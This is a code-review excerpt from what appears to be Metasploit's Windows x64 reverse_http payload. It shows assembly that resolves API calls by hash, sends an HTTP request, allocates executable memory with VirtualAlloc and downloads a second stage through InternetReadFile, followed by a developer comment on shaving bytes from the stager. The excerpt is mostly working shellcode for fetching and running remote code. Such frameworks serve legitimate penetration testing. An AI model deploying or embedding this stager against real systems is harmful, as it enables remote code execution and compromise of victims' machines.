lib/msf/core/payload/windows/x64/reverse_http.rb

```diff
@@ -0,0 +1,468 @@
+        pop rdx
+        push rbx                      ; 0 for alignment
+        push #{set_option_flags}      ; (dwFlags)
+        mov r8, rsp
+        push 4                        ; sizeof(dwFlags)
+        pop r9
+        mov r10, 0x869E4675           ; hash( "wininet.dll", "InternetSetOptionA" )
+        call rbp
+      ^
+    end
+
+    asm << %Q^
+      httpsendrequest:
+        mov rcx, rsi                  ; HINTERNET (hRequest)
+        ; the push/pop sequence saves a byte over XOR
+        push rbx
+        pop rdx                       ; NULL pointer (lpszHeaders)
+        xor r8, r8                    ; 0 (dwHeadersLength)
+        xor r9, r9                    ; NULL pointer (lpOptional)
+        push rbx                      ; 0 for alignment
+        push rbx                      ; 0 (dwOptionalLength)
+        mov r10, 0x7B18062D           ; hash( "wininet.dll", "HttpSendRequestA" )
+        call rbp
+        test eax, eax                 ; use eax, it's 1 byte less than rax
+        jnz allocate_memory
+
+      try_it_again:
+        dec edi                       ; use edi, it's 1 byte less than rdi
+        jz failure
+        jmp retry
+    ^
+
+    if opts[:exitfunk]
+      asm << %Q^
+      failure:
+        call exitfunk
+      ^
+    else
+      asm << %Q^
+      failure:
+        push 0x56A2B5F0           ; hardcoded to exitprocess for size
+        call rbp
+      ^
+    end
+
+    asm << %Q^
+      allocate_memory:
+        ; the push/pop sequence saves a byte over XOR
+        push rbx
+        pop rcx                     ; NULL pointer (lpAddress)
+        mov rdx, 0x00400000         ; SIZE_T (dwSize)
+        mov r8, 0x1000              ; MEM_COMMIT (flAllocationType)
+        push 0x40
+        pop r9                      ; PAGE_EXECUTE_READWRITE (flProtect)
+        mov r10, 0xE553A458         ; hash( "kernel32.dll", "VirtualAlloc" )
+        call rbp                    ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+      download_prep:
+        xchg rax, rbx               ; place the allocated base address in ebx
+        push rbx                    ; store a copy of the stage base address on the stack
+        push rbx                    ; temporary storage for bytes read count
+        mov rdi, rsp                ; &bytesRead
+
+      download_more:
+        mov rcx, rsi                ; HINTERNET (hFile)
+        mov rdx, rbx                ; (lpBuffer)
+        mov r8, 8192                ; (dwNumberOfBytesToRead)
+        mov r9, rdi                 ; (lpNumberOfBytesRead)
+        mov r10, 0xE2899612         ; hash( "wininet.dll", "InternetReadFile" )
+        call rbp
+        add rsp, 32                 ; clean up reserved space
+
+        test eax, eax               ; did the download fail?
+        jz failure
+
+        mov ax, word ptr [rdi]
+        ; Use ebx/eax here because we save bytes (don't need higher order 32 bits)
```

Comment:
`jrcxz` is the "jump if zero" condition. We don't want to jump if zero, we want to jump when non-zero. If I add another jump, we end up at the same size as what we had when we started :) If we had `jrcxnz` then we'd be set! But we don't.. bummer. I trimmed a byte here by doing `test eax, eax` instead of `test rax, rax`, but in this area I'm yet to see more savings.

Also, had to rejig earlier code to make sure that `[rdi]` didn't have higher-order bytes set thanks to it having addresses stored earlier.